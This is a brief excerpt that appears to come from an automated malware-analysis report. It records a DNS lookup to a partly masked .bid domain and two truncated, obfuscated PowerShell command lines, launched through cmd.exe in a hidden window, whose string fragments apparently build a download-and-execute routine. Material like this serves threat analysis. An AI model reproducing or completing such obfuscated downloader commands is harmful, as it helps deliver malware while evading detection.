Technical Information
- DNS ASK jh##h.bid
- '<SYSTEM32>\cmd.exe' /c " powershell $odyx='^-Pr';$mdosmel='^Sys';$vnehetx='^exe';$ypoq='^.Do';$mhovma='^ St';$uwcozha='^lic';$vocty='^=($';$bumgy='^(Ne';$ygate='^dgh';$pdeju='^ypa';$rtopa='^th';$amjifxo='^mp+...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c " powershell $odyx='^-Pr';$mdosmel='^Sys';$vnehetx='^exe';$ypoq='^.Do';$mhovma='^ St';$uwcozha='^lic';$vocty='^=($';$bumgy='^(Ne';$ygate='^dgh';$pdeju='^ypa';$rtopa='^th';$amjifxo='^mp+...